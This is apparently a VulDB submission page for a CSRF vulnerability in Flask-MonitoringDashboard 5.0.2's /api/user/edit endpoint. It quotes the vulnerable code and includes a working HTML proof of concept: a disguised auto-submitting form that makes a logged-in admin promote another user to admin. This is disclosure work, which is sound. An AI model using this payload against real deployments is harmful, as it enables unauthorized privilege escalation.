| Titolo | flask-dashboard Flask-MonitoringDashboard v5.0.2 CSRF |
|---|
| Descrizione | # CSRF Vulnerability in User Privilege / Password Modification (/api/user/edit)
## Summary
A **Cross-Site Request Forgery (CSRF)** vulnerability exists in the dashboard user-edit endpoint `/api/user/edit`. The lack of CSRF protection allows an attacker to force an authenticated administrator to change the admin status of any user (privilege escalation / demotion) without authorization.
## Vulnerability Details
### Configuration-Level Issue
**File**: `flask_monitoringdashboard/core/auth.py`
```python
def admin_secure(func):
@wraps(func)
def wrapper(*args, **kwargs):
if session and session.get(config.link + '_logged_in'): # ❌ cookie-only authorization
if session.get(config.link + '_admin'):
return func(*args, **kwargs)
return redirect(url_for(config.blueprint_name + '.login'))
return wrapper
# ❌ No CSRF protection anywhere in the package
# ❌ Session cookie has no SameSite attribute enforced
```
### Endpoint-Level Code Analysis
**File**: `flask_monitoringdashboard/views/auth.py` (Lines 99-129)
```python
@blueprint.route('/api/user/edit', methods=['POST'])
@admin_secure
def user_edit():
"""Update the user in the database."""
user_id = int(request.form['user_id'])
is_admin = request.form['is_admin'] == 'true' # ⚠️ toggle admin flag of any user
# ❌ No CSRF token validation
# ❌ No Origin/Referer verification
with session_scope() as session:
user = session.query(User).filter(User.id == user_id).one()
user.is_admin = is_admin # ⚠️ privilege escalation/demotion
old_password = request.form.get('old_password')
if old_password is not None:
if user.check_password(old_password):
new_password = request.form['new_password']
...
user.set_password(new_password)
return 'OK'
```
**Security Issues**:
1. ❌ No CSRF token validation
2. ❌ No origin verification
3. ⚠️ Changes the `is_admin` flag of an arbitrary user without requiring any secret (the `old_password` check only gates the optional password change, not the privilege toggle)
## Proof of Concept (PoC)
```html
<!DOCTYPE html>
<html>
<head>
<title>System notification</title>
</head>
<body>
<h2>???? Applying your preferences...</h2>
<!-- Promote user_id=3 to admin in the victim admin's context -->
<form id="csrf-form" action="http://127.0.0.1:5000/dashboard/api/user/edit" method="POST">
<input type="hidden" name="user_id" value="3">
<input type="hidden" name="is_admin" value="true">
</form>
<script>
setTimeout(function() {
document.getElementById('csrf-form').submit();
}, 1000);
</script>
</body>
</html>
```
## Impact
**Privilege escalation / account tampering** - An attacker can silently promote an
attacker-controlled (non-admin) user to admin, or demote legitimate admins, by tricking a
logged-in administrator into visiting a page.
---
**CVSS Score**: 6.5 (Medium) — `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N`
**CWE**: CWE-352 (Cross-Site Request Forgery)
---
**Reported by**: flashzyc
**Date**: 2026-06-07
|
|---|
| Fonte | ⚠️ https://github.com/flask-dashboard/Flask-MonitoringDashboard/issues/559 |
|---|
| Utente | flashzyc (UID 92850) |
|---|
| Sottomissione | 07/06/2026 09:00 (1 mese fa) |
|---|
| Moderazione | 08/07/2026 09:39 (1 month later) |
|---|
| Stato | Duplicato |
|---|
| Voce VulDB | 376785 [flask-dashboard Flask-MonitoringDashboard fino a 5.0.2 cross site request forgery] |
|---|
| Punti | 0 |
|---|